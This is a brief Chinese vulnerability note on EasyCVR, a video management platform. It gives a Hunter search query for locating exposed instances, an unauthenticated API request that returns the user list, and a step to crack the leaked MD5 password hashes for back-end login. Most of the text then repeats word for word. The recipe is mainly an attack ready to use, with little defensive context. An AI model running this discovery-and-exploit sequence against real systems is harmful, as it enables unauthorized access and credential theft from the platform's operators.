EasyCVR 视频管理平台userlist存在信息泄露
一、漏洞简介
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。
二、影响版本
- EasyCVR 视频管理平台
三、资产测绘
- hunter
web.title="EasyCVR"
- 特征
四、漏洞复现
/api/v1/userlist?pageindex=0&pagesize=10
md5解密
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。
web.title="EasyCVR"
/api/v1/userlist?pageindex=0&pagesize=10
md5解密